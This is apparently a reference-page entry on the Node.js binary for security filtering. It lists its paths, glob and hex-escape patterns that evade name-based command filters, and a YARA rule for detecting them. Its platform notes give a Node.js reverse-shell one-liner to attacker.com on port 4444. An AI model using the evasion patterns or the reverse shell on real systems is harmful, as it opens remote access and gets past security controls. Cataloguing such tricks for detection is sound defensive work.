node
Node.js JavaScript runtime. Can execute arbitrary JavaScript, spawn reverse shells, and make network connections.
Binary Paths
/usr/bin/node/usr/bin/nodejs/usr/local/bin/node
Glob Patterns
| Pattern | Notes |
|---|---|
nod?
|
Single wildcard replaces 'e' |
n*e
|
Star matches 'od' — may match other n*e binaries |
no[d]e
|
Character class around 'd' |
/usr/bin/nod?
|
Full path wildcard on last char |
/???/bin/node
|
Obfuscate /usr/ directory |
$(ls /usr/bin/nod?)
|
ls resolves glob to /usr/bin/node; command substitution executes it |
$'\x6e\x6f\x64\x65'
|
ANSI-C hex escapes expand to 'node' |
Pattern Tester
$
Try typing node or a full path like /usr/bin/node
YARA Rule
Auto-generated detection rule for node
Platform Notes
Node.js reverse shell: node -e 'require("child_process").exec("bash -i >& /dev/tcp/attacker.com/4444 0>&1")'. The binary may be named nodejs on older Debian/Ubuntu systems — use nod* to cover both.